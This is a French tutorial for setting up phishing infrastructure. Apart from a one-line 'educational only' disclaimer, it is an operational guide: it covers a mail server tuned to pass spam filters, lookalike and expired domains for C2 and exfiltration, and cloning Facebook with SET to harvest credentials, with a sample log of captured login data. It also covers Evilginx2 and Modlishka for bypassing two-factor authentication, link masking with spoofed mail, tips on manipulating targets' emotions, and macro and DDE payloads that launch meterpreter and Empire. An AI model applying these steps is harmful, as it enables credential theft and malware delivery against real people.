Création d'un serveur de phishing
ATTENTION : CETTE ARTICLE EST UNIQUEMENT A BUT EDUCATIF.
Tutoriel en anglais pour comprendre les étapes pour monter un serveur Postfix (https://github.com/n0pe-sled/Postfix-Server-Setup)
Une adresse mail, c'est un peu comme une adresse postale. Elle se divise en 2 parties :
- un domaine : wanadoo.fr
- un utilisateur : kevin
Dans mon exemple, lorsque l'on écrit à Kevin via l'adresse [email protected], cela signifie que l'on écrit à l'utilisateur kevin du domaine wanadoo.fr.
Plus précisément, le mail arrive sur la machine sur laquelle se trouve le serveur mail de wanadoo.fr, pour être ensuite remis dans la boîte mail de l'utilisateur kevin.
Pour avoir son serveur mail, il faut donc :
- un nom de domaine
Je conseil ovh, 1&1ionos, ou encore godaddy
Astuce : Prenez un nom de domaine qui se rapproche du site que vous voulez copier ou de l’entreprise que vous voulez phisher.
Cette partie se révèle souvent être une prise de tête pour les apprentis auto-hébergés.
On doit spécifier dans le serveur DNS sur quelle IP on peut joindre le serveur mail.
La plupart des registrars (les marchands de noms de domaine) fournissent une interface simplifiée pour le serveur DNS.
Un exemple de configuration pour un domaine acheté chez Gandi.net
- Le champ A
Il faut tout d'abord configurer le champ A qui fait le lien entre nom de domaine et l'adresse IP du serveur :
@ IN A 12.34.56.78
smtp IN A 12.34.56.78
@ : signifie que monDomaine.com est lié à l'IP 12.34.56.78
smtp : signifie que le sous-domaine smtp.monDomaine.com est lui aussi lié à l'IP 12.34.56.78
Vous pouvez indiquer des adresses IP différentes si vous possédez plusieurs serveurs et plusieurs IP.
- Le champ MX
Une fois que le champ A est complété, il faut pour définir le serveur mail s'occuper du champ MX (Mail eXchange).
Nous allons convenir que le serveur mail correspond au serveur smtp.monDomaine.com. Son adresse IP ayant déjà été définie par le champ A, le champ MX s'écrit sous cette forme :
monDomaine.com. IN MX 10 smtp
Ce qui signifie que smtp du champ A sera le serveur MX de monDomaine.com.
Vous suivez toujours ??
Lorsque vous enverrez des mails sur le domaine monDomaine.com, ils seront automatiquement acheminés vers le serveur smtp.monDomaine.com.
Important :
- Un champ MX se définit toujours sur un champ A, pas sur un CNAME (non abordé ici)
- Ne pas oublier le point après monDomaine.com.
Un exemple de configuration de DNS chez gandi.net
Gandi.jpeg
Ce qui donne en mode "expert" :
smtp 300 IN A 41.188.26.122
@ 28800 IN MX 10 smtp
www 10800 IN A 41.188.26.122
Avant même d'installer et configurer son serveur, il faut faire quelques vérifications (après avoir installé bind9-host).
$ host -t MX monDomaine.com
Cette commande doit retourner une ligne de ce genre :
monDomaine.com mail is handled by 10 smtp.monDomaine.com
Bien sûr, smtp.monDomaine.com doit être associé à votre IP fixe :
$ ping smtp.monDomaine.com
PING smtp.monDomaine.com (12.34.56.78) 56(84) bytes of data.
Si ces 2 vérifications ne fonctionnent pas, ce n'est pas la peine d'aller plus loin, votre serveur DNS est mal configuré.
Si votre serveur se trouve derrière une *box, il ne pourra pas communiquer avec le monde extérieur. Il nous faut ouvrir des ports.
Votre *box possède une IP fixe publique, c'est l'IP que vous avez normalement renseignée dans votre serveur DNS.
Derrière votre *box, il y a votre serveur mail qui lui possède également une adresse IP, privée. Les adresses privées sont en général 192.168.0.xxx ou 192.168.1.xxx.
Admettons que votre serveur ait comme IP 192.168.0.25 dans votre réseau privé. Il faut alors que votre *box redirige toutes les requêtes mail vers l'IP privée 192.168.0.25.
Les ports à ouvrir sont :
- 25 : pour que le serveur réceptionne les mails
- 110 : pour relever ses mails via POP
- 143 : pour relever ses mails via IMAP
Tous ces ports sont à ouvrir en TCP.
Astuce : Si vous avez bien suivis le tutoriel, vous utilisez sans doute DigitalOcean et un droplet. Alors vous vous posez la question : comment ouvrir mes ports avec une instance en ligne?!?
Pas de panique, il suffit d’utiliser la commande ufw.
ufw enable
ufw status
ufw allow <PORT>
Votre DNS est correctement configuré ? Les ports sont ouverts ? Bien. Vous avez fait le plus dur.
Vérifiez le nom de votre machine :
$ hostname
Cette commande doit vous retourner smtp.monDomaine.com. Si ce n'est pas le cas, éditez le fichier
/etc/hosts et vérifiez que vous avez une ligne comme suit :127.0.0.1 smtp.monDomaine.com smtp
Sauvegardez le fichier avec CTR+X, puis dans votre terminal entrez
# hostname smtp.monDomaine.com
Normalement, le hostname est maintenant OK.
Il est important que le hostname de votre machine soit le même que celui retourné par la commande
$ host -t MX monDomaine.com, sinon Postfix posera des problèmes.
# sudo apt aptitude
# aptitude install postfix
Choisissez la configuration Internet Site. Indiquez ensuite le nom de votre machine : smtp.monDomaine.com (correspond au hostname)
Au cas où vous voudriez recommencer :
# dpkg-reconfigure postfix
Le fichier de configuration de postfix est
/etc/postfix/main.cf. Il est par défaut très bien sécurisé.Nous allons dans un premier temps y ajouter cette ligne :
home_mailbox = Maildir/
Cette ligne dit à postfix que les mails des utilisateurs doivent aller dans un répertoire nommé Maildir.
Commentez (ajoutez un #) la ligne où se trouve mailbox_command pour que procmail ne soit pas utilisé (en tout cas pas pour le moment):
#mailbox_command = procmail -a "$EXTENSION"
Pour que la modification soit prise en compte, redémarrez postfix :
# /etc/init.d/postfix restart
Bien. Vous avez votre domaine, votre serveur mail tourne. Créer une adresse mail est très simple. Il suffit d'ajouter un utilisateur !!
Vous voulez créer une adresse [email protected] ? Ajoutez l'utilisateur kevin sur votre machine :
# adduser kevin
Répondez aux questions, choisissez un mot de passe à kevin et c'est tout.
Nous allons envoyer un mail à Kevin, vérifions que le paquet mailx est installé :
# aptitude install mailx
On envoie le mail :
# echo "Le contenu du mail" | mail -s "ceci est le sujet" [email protected]
Le mail sera automatiquement déposé dans le répertoire Maildir situé dans le home de kevin. S'il n'existe pas, le répertoire Maildir sera automatiquement créé.
# ls /home/kevin
N'hésitez pas à consulter les logs pour voir tout ce qui se passe sur votre serveur mail :
# cat /var/log/mail.log
Kevin veut lire ses mails !!
Envoyer des mails, c'est bien mais pouvoir les lire, c'est mieux !! Pour que Kevin puisse lire ses mails dans un client comme Mozilla Thunderbird, c'est tout simple :
Kevin veut réceptionner ces mails via IMAP :
# aptitude install dovecot-imapd
Il préfère POP3 ? Pas de problèmes :
# aptitude install dovecot-pop3d
C'est tout, vous pouvez maintenant utiliser votre client mail favori pour réceptionner vos mails.
Serveur : smtp.monDomaine.com
Login : kevin
Password : le password défini lors de la création de l'utilisateur kevin
Kevin veut envoyer des mails !!
Kevin est content, il peut lire ses mails. Seulement, il aimerait répondre à ses amis mais il ne peut pas.
Postfix possède son propre service SMTP, mais ce dernier sera généralement bloqué. Pour limiter les envois de SPAMS, les FAI bloquent généralement l'envoi de mails.
Pour que votre serveur mail puisse envoyer des mails, il faut lui dire d'utiliser le SMTP de votre FAI. C'est le paramètre relayhost du fichier de configuration
/etc/postfix/main.cf qu'il faut modifier :relayhost = smtp.votreFAI.com
Principaux SMTP français :
Orange : smtp.orange.fr
Free : smtp.free.fr
Neuf : smtp.neuf.fr
Cependant, certains FAI (comme Free) permettent de lever ce blocage via une option dans leur panel de gestion.
Dans ce cas, plus besoin du relayhost. Vos mails ne passeront plus par votre FAI, c'est VOTRE serveur qui enverra directement les mails.
Le problème est que les mails que vous enverrez vers les boîtes Yahoo seront classées en tant que SPAM. AOL ne voudra pas de vos mails (ce sera explicitement marqué dans les logs). Quant à Hotmail, les logs vous diront que les mails ont bien été reçus, mais vos correspondants ne les recevront jamais. Gmail ne pose quant à lui aucun souci.
Vous voulez utiliser le plus possible votre propre SMTP mais vous voulez quand même pouvoir envoyer des mails vers vos potes restés chez Hotmail ?
Créez un fichier
/etc/postfix/transport avec ce contenu :hotmail.fr smtp:smtp.free.fr
hotmail.com smtp:smtp.free.fr
yahoo.fr smtp:smtp.free.fr
yahoo.com smtp:smtp.free.fr
Ce fichier dit à postfix que pour les domaines hotmail.fr, hotmail.com, yahoo, etc., il utilisera le SMTP de free. Pour tous les autres domaine, il utilisera le smtp local. A vous d'adapter ce fichier en fonction des domaines qui ne veulent pas de vous.
Bien sûr, si vous n'êtes pas abonné Free, vous ne pourrez pas utiliser le SMTP de Free.
Pour que Postfix prenne en compte ce fichier, exécutez cette commande :
# postmap /etc/postfix/transport
Puis relancez Postfix :
# /etc/init.d/postfix restart
A chaque fois que vous modifierez
/etc/postfix/transport, n'oubliez pas d'exécuter la commande précédente (postmap).Nous pouvons rajouter le support de STARTTLS, ce qui permet à un moment donné de chiffrer la connexion avec Postfix. L'avantage est que l'on peut alors chiffrer l'authentification SASL pour que le mot de passe n'apparaisse pas en clair. On peut aussi chiffrer le contenu des messages, mais pour cela il est plus intéressant de s'orienter vers GPG ou S/MIME, afin de s'assurer que le message reste chiffré d'un bout à l'autre entre l'expéditeur et le destinataire.
sudo add-apt-repository ppa:certbot/certbot
sudo apt-get update
sudo apt-get install python-certbot-apache
sudo certbot --apache -d example.com
sudo certbot renew --dry-run
Une fois le certificat obtenu, il suffit de rajouter dans main.cf :
smtpd_tls_cert_file = /chemin/vers/certificat
smtpd_tls_key_file = /chemin/vers/clef
smtpd_use_tls = yes
Docs Additionnelles et sources :
- https://github.com/LukeSmithxyz/emailwiz/blob/master/emailwiz.sh #Automatisation de la création du serveur smtp
docker run -t -i kalilinux/kali-linux-docker /bin/bash
expireddomains.net est un moteur de recherche pour les domaines récemment expirés ou abandonnés. Il fournit la recherche et le filtrage avancé, tels que l'âge d'expiration, le nombre de backlinks, le nombre de snapshots Archive.org, le score de SimilarWeb. En utilisant le site, nous pouvons enregistrer des domaines pré-utilisés, qui ressemblent à notre cible, ressemblent à notre imitation, ou sont simplement susceptibles de se fondre dans le réseau de notre cible.
Lorsque vous choisissez un domaine pour C2 ou l'exfiltration de données, pensez à choisir un domaine classé dans les catégories Finance ou Santé. Beaucoup d'entreprises n'utiliseront pas SSL à moyen terme sur ces catégories en raison de la possibilité de problèmes juridiques ou de sensibilité des données. Il est également important de vous assurer que le domaine que vous avez choisi n'est pas associé à des programmes malveillants ou à des campagnes de phishing précédentes.
L'outil CatMyFish automatise les recherches et la vérification des catégories Web avec expireddomains.net et BlueCoat. Il peut être modifié pour appliquer plus de filtres aux recherches ou même effectuer une surveillance à long terme des actifs que vous enregistrez.
Un autre outil, DomainHunter renvoie la catégorisation BlueCoat/WebPulse, IBM X-Force, et Cisco Talos, l'âge du domaine, les autres TLD disponibles, les liens Archive.org et un rapport HTML. De plus, il effectue des vérifications pour une utilisation dans des campagnes connues de malware et de phishing en utilisant Malwaredomains.com et MXToolBox. Cet outil inclut également la prise en charge de l'OCR pour contourner les captchas BlueCoat/WebPulse. Jetez un coup d'œil à l'article du blogue sur la version initiale de l'outil pour plus de détails.
Un autre outil, AIRMASTER utilise expireddomains.net et Bluecoat pour trouver des domaines catégorisés. Cet outil utilise l'OCR pour contourner le captcha BlueCoat, augmentant ainsi la vitesse de recherche.
Enfin, assurez-vous que vos paramètres DNS ont été correctement configuré.
Les mots " facile " et " phishing " ne semblent jamais vraiment aller ensemble. La mise en place d'une infrastructure de phishing peut s'avérer très pénible. Le tutoriel suivant vous fournira les connaissances et les outils nécessaires pour configurer rapidement un serveur de phishing qui passe "la plupart" des filtres anti-spam à ce jour et vous fournira une interface RoundCube. Il existe évidemment d’autres méthodes.
Une fois que vous avez un domaine , vous devrez créer quelques enregistrements "A" pour votre domaine tel qu'illustré.
Configuration DNS
Il faut ensuite éditer vos hosts avec les commandes suivantes :
nano /etc/hosts
Vous devrez ensuite remplir le fichier comme çi-dessous.
127.0.0.1 nomdedomaine.com
127.0.0.1 mail.nomdedomaine.com mail
CTRL+X pour enregistrer le fichier puis executez la commande suivante :
hostname mail.nomdedomaine.com
Maintenant, vous allez installer le front-end. Commencez par télécharger la dernière version "BETA" d'iRedMail sur votre serveur de phishing. La manière la plus simple est de cliquer avec le bouton droit de la souris sur le bouton de téléchargement, copier l'adresse du lien, utiliser wget pour le télécharger directement sur votre serveur. Ensuite, décompressez-le
"tar -xvf iRedMail-0.9.8-beta2.tar.bz2".
Naviguez dans le dossier décompressé et rendez le script iRedMail.sh exécutable
chmod +x iRedMail.sh).
Exécutez le script en tant que root, et redémarrer le serveur pour finir l’installation.
ATTENTION : A partir de ce moment vous allez avoir un problème. En effet Apache et nginx écoute sur le même port 80. Cela m’as pris pas mal d’heure avant de comprendre d'où venait l’erreur et comment la fixer. Voici le tuto à suivre avant de passer à l’étape suivante :
Redémarrer les deux services et connectez vous à l’interface mail, puis à iRedadmin et roundcube. Si tout s’affiche correctement c’est parfait.
Vous voudrez vous assurer d'avoir tous les enregistrements DNS corrects reliés à votre serveur de messagerie. Voici comment les mettres en place :
Configurer les enregistrements DNS pour votre serveur iRedMail (A, PTR, MX, SPF, DKIM, DMARC) :
Nom : Ce sera l'hôte de votre domaine qui est en fait un ordinateur dans votre domaine. Votre nom de domaine est automatiquement ajouté à votre nom.
Remarque : Si vous laissez le champ nom vide, il sera par défaut l'enregistrement pour votre domaine de base mydomain.com. L'enregistrement de votre domaine de base s'appelle l'enregistrement racine ou apex.
Exemple d'enregistrement A :
NAME TTL TYPE DATA
www.mydomain.com 1800 A 192.168.1.2
mail.mydomain.com. 1800 A 192.168.1.2
Le résultat final de ce record est que www.mydomain.com pointe vers <IpPublic>, et mail.mydomain.com pointe vers <IpPublic>
3. Comment configurer l'enregistrement MX
Si votre FAI ou agent d'enregistrement de noms de domaine fournit le service DNS, vous pouvez lui demander d'en créer un pour vous. Si vous gérez vos propres serveurs DNS, vous devez créer vous-même les enregistrements MX dans votre zone DNS.
Exemple d'enregistrement MX :
Name Priority TTL Domain
mydomain.com. 10 mx mail.mydomain.com
Le résultat final de cet enregistrement vont faire que les emails envoyés à [user]@mydomain.com seront envoyés au serveur mail.mydomain.com.
Un nouveau type d'enregistrement SPF a récemment été ajouté au protocole DNS pour le supporter (RFC4408).
Cependant, tous les serveurs DNS et de messagerie ne supportent pas encore ce nouveau type d'enregistrement, de sorte que SPF peut également être configuré en DNS en utilisant le type d'enregistrement TXT.
Exemple:
SPF se réfèrent directement à l'adresse IP. Cela signifie que les courriels envoyés à partir d'une adresse IP spécifiée sont autorisés par l'organisation expéditrice.
mydomain.com. 3600 IN TXT "v=spf1 ip4:192.168.1.100 -all"
-all signifie que toutes les autres adresses IP sont prohibées.
Commande d'exécution dans le terminal pour afficher vos touches DKIM :
# amavisd-new showkeys
dkim._domainkey.mydomain.com. 3600 TXT (
"v=DKIM1 ; p="
"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDYArsr2BKbdhv9efugByf7LhaK"
"txFUt0ec5+1dWmcDv0WH0qZLFK711sibNNN5LutvnaiuH+w3Kr8Ylbw8gq2j0UBok"
"FcMycUvOBd7nsYn/TUrOua3Nns+qKSJBy88IWSh2zHaGbjRYujyWSTjlPELJ0H+5"
"EV711qseo/omquskkwIDAQAB"))
Remarque : Sur certaines distributions Linux/BSD, vous devriez utiliser la commande amavisd-new au lieu de amavisd. S'il se plaint de l'absence de /etc/amavisd.conf, vous devriez indiquer à amavisd le chemin correct du fichier de configuration.
Exemple :
# amavisd -c /etc/amavisd/amavisd/amavisd.conf showkeys
Copiez la sortie de la commande ci-dessus sur une ligne comme ci-dessous, supprimez toutes les guillemets, mais gardez tous les point virgules “;”.
Nous avons juste besoin de chaînes de caractères dans le bloc (), c'est la valeur de l'enregistrement DKIM DNS.
v=DKIM1 ; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDYArsr2BKbdhv9efugBy.....
Ajouter un enregistrement DNS de type TXT pour le nom de domaine dkim._domainkey.mydomain.com, définir la valeur de la ligne que vous avez copiée ci-dessus : v=DKIM1 ; p=......
ATTENTION : Une erreur habituelle est d'ajouter cet enregistrement DKIM au nom de domaine mydomain.com, ceci est faux. Assurez-vous d'avoir ajouté le nom de domaine
dkim._domainkey.mydomain.com.Après l'avoir ajouté dans DNS, vérifiez le avec dig ou nslookup :
dig -t txt txt dkim._domainkey.mydomain.com
nslookup -type=txt dkim._domainkey.foodmall.com
Cela devrait vous renvoyer quelque chose comme ça :
dkim._domainkey.mydomain.com. 600 IN TXT "v=DKIM1\;p=..."
Et vérifiez avec Amavisd :
# amavisd testkeys
TESTING : dkim._domainkey.mydomain.com => pass
Si il affiche pass, ça marche niquel !
Si vous voulez re-générer la clé DKIM, ou si vous avez besoin d'en générer une pour un nouveau domaine, voici un tuto à suivre : Signer la signature DKIM sur les e-mails sortants pour le nouveau domaine de messagerie.
Pour la DMARC, vous pouvez utiliser (https://www.unlocktheinbox.com/dmarcwizard/) pour générer votre entrée dmarc. Il faut créer un record TXT.
a. Enregistrez votre domaine de messagerie dans Google Postmaster Tools
Tableau de bord iRedMail
Maintenant, créez un utilisateur avec qui phisher.
iRedMail Créer un utilisateur
Connectez-vous à l'interface RoundCube avec votre nouvel utilisateur !
Ouverture de session RoundCube
RoundCube Envoyer du courrier
Cobalt Strike est un super outil pour effectuer du SpearPhishing. Je vous laisse consulter les tutos et docs ci dessous (je ferais peut être un modules prochainement sur CobaltStrike).
Cobalt Strike Spearphishing Popup
Au-delà de votre propre installation de phishing ou l’utilisation de Cobalt Strike, il existe des Framework spécialement conçus pour le phishing. En voici quelques uns que vous pouvez utilisez et quelques docs dessus :
Lors d’une attaque de ce type, on joue beaucoup sur les émotions des gens, leur capacité à être naïfs, le fait qu’ils peuvent être heureux, tristes, impatients, … Par exemple, on sait que la plupart des hommes aiment les belles femmes, dans ce cas là si ma cible est un homme, je vais essayer de lui faire faire des actions stupides en l’appâtant avec des photos de jolies filles dans un email par exemple. Bon là l’exemple est basique, mais le principe reste le même pour tout ! Proposer de l’argent, des cadeaux, enfin plein de choses pour lesquels les gens sont souvent naïfs. Et je parle en connaissance de cause. Ca m’est déjà arrivé de me faire avoir ! :p
Cloner SET
╰─➤ git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
Configuration de SET pour utiliser Apache (SET utilise Python par défaut)
gedit /etc/setoolkit/set.config
Configurer le fichier comme çi-dessous
APACHE_SERVER=ON
APACHE_DIRECTORY=/var/www/html
HARVESTER_LOG=/var/www/html
Astuce :
- Configurer Apache pour utiliser le protocole SSL
- Déplacer vos images et ressources localement au lieu de les charger depuis le vrai site web
- Vous pouvez utiliser une clé PGP pour sauvegarder les credentials obtenus. Si votre serveur est compromis les données ne pourront pas être lu par autrui.
- On sélectionne l’option 1 (Social Engineering Attacks).
- Puis l’option 2 (Website Attack Vectors).
- On choisit ensuite l’attaque de type “Credential Harvester Attack Method” (numéro 3) car notre objectif est de récupérer les identifiants de nos cibles lors de leur connection à notre site cloné.
- On choisit la fonction Site Cloner afin que SET clone le site pour nous.
- Il faut ensuite renseigner l’ip du serveur qui va recevoir les infos du POST de notre faux formulaire. Mettez l’url de votre serveur, par exemple. Puis il faut renseigner l’url du site à cloner. Ici j’ai pris Facebook pour l’exemple.
- Et voilà, notre site cloné est prêt. Il vous suffit de vous rendre sur l’ip que l’on a fourni précédemment et voilà le résultat.
Essayez de vous connecter via le formulaire et en même temps faites un
tail -f du fichier .txt dans le répertoire /var/www/. Vous constaterez qu’une fois le bouton “Log in” cliqué, les identifiants que vous avez entrés vont s’afficher dans le fichier (ici sous l’intitulé email et pass):╭─[email protected] /var/www
╰─➤ tail -f harvester_2015-10-02\ 12\:08\:16.708617.txt
Array
(
[lsd] => AVrM0Khj
[display] =>
[enable_profile_selector] =>
[isprivate] =>
[legacy_return] => 1
[profile_selector_ids] =>
[skip_api_login] =>
[signed_next] =>
[trynum] => 1
[timezone] => -120
[lgndim] => eyJ3IjoxOTIwLCJoIjoxMDgwLCJhdyI6MTkyMCwiYWgiOjEwNTQsImMiOjI0fQ==
[lgnrnd] => 050816_HWlq
[lgnjs] => 1443787724
[email] => test
[pass] => testpassword
[persistent] => 1
[default_persistent] => 0
[qsstamp] => W1tbMzUsODQsODcsODgsOTgsMTAyLDExMCwxMzMsMTM0LDE3MywxOTIsMjA4LDIyMSwyNDgsMjU2LDI3MCwzMDEsMzAzLDMwNCwzNTQsMzY0LDM4Niw0MDgsNDUxLDQ1NSw0NzEsNDc1LDUwOCw1MTksNTIwLDUyNCw1NDAsNTUwLDU1Nyw1NjIsNTc0LDU4OCw1OTIsNTk5LDYxMiw2NDQsNzc3XV0sIkFabkI0Z3pZTmNOZUtrblNwcWpsLW9HTXZvU0VKZjQ2SWVJTU1oNjVnd0ZjN2VUbVNOaGp5U0VRempPU0RkVXNDRXRNZmJYV1IwUjZqU2UzRkl1MmdwRXlvUmE4RWZtSDFtN2xrY1NhaFU4VlpROUppSk5LUnJjZ2NyZzk3SlZZTGpjN0FnNWZteFdsdjUxOHByRWFXV0xVQWl4QTJOdzRWUlhGVGtNbGlfUzdOa0hMX0VwV0FOOU1Wa3JQcUxvWDZpdEJrdDlUaXNSWnVxSmVkMUJCQlJFcCJd)
- 1.Installation de BlackEye
$ cd Desktop/
$ git clone https://github.com/thelinuxchoice/blackeye.git
$ cd blackeye/
$ ls
$ chmod +x blackeye.sh
$ ./blackeye
Vous pouvez maintenant partager votre adresse IP locale avec la victime. Maintenant, l'étape la plus importante est de savoir comment la transmettre à la victime.
Vous pouvez masquer l'adresse IP avec des services de raccourcissement d'URL du genre bitly et autre. De plus, vous pouvez utiliser Emkei's Fake Mailer pour envoyer un e-mail falsifié.
Remarque : L'outil ne fonctionne que sur le réseau local. AnonuD4y travaille sur la modification du script pour intégrer Ngrok avec lui afin qu'il fonctionne sur WAN mais il a quelques problèmes avec le démarrage de Ngrok. Vous pouvez consulter cette version sur Github. Aussi, vous savez peut-être pour Modlishka. Un outil qui peut contourner l'authentification à deux facteurs des sites Web, y compris les services Google. Vous n'avez pas besoin de cloner les modèles. Modlishka fonctionne comme un proxy entre vous et le serveur, ce qui signifie que le serveur fonctionne en direct.
a. Setup Modlishka
$ go get -u github.com/drk1wi/Modlishka
Compiler les binaires :
$ cd $GOPATH/src/github.com/drk1wi/Modlishka/
$ make
alt text
a. Setup Digital Ocean :
Il suffit d’aller sur le site DigitalOcean, prendre l'abonnement à 5eur par mois puis créer votre VM.
b. Setup EvilGinx2 (https://www.youtube.com/watch?v=SxTs9pVYBMw) :
1. Installation avec RedHat:
$ go get -u github.com/golang/dep/cmd/dep
$ sudo apt-get install git make
$ go get -u github.com/kgretzky/evilginx2
$ cd $GOPATH/src/github.com/kgretzky/evilginx2
$ make
Pour installer evilginx2 :
Exécuter evilginx2 depuis un répertoire local :
$ sudo ./bin/evilginx -p ./phishlets/
Astuce : Installez le pour qu’il soit accessible partout depuis votre terminal :
$ sudo make install
$ sudo evilginx
2. Installation depuis des package en binaire
$ unzip <package_name>.zip -d <package_name>
$ cd <package_name>
$ chmod 700 ./install.sh
$ sudo ./install.sh
$ sudo evilginx
a. Setup Gophish
https://alexnogard.com/gophish-familiarisez-vos-employes-au-phishing-part-i-installation/
Version Python de Gophish
Il y a plusieurs façons de créer des payloads sous formes de macros, en voici quelques unes :
./unicorn windows/meterpreter/reverse_https <LHOSTS> <LPORT> macro
msfconsole -r ./unicorn.rc #start metasploit listener
empire
usestager windows/macro #selectionne le stager Macro
info #liste les infos concernant le payload
generate
ou
usestager /windows/macroless_msword
Copier les Macros dans un doc
- 1.Ouvrir un doc excel
- 2.Allez dans l’onglet développeur
- 3.Cliquez sur macro pour créer de nouveaux macros
- 4.copier votre payload dedans
Ouvrir Office puis cliquez sur “Autoriser l'accès au VBA”
VBad, obfusque, encrypt, rajoute de fausses clés et détruit l’encryption dès le premier résultats ainsi que détruit toute références au module pour être invisible aux yeux des développeur
Utilisation de DDE (Dynamic Data Exchange)
- 1.Ouvrir un document Word
- 2.Insérer une nouvelle Tab
- 3.Aller dans le champs d'écriture et choisissez formule
- 4.Clic droit sur “Fin de la formule non respecté” et choisir “Afficher le code au lieu de sa valeur”
- 5.Changer le chemin par votre payload :
DDEAUTO c:\\windows\\system32\\cùd.exe”/k powershell.exe <Votre payload EMPIRE>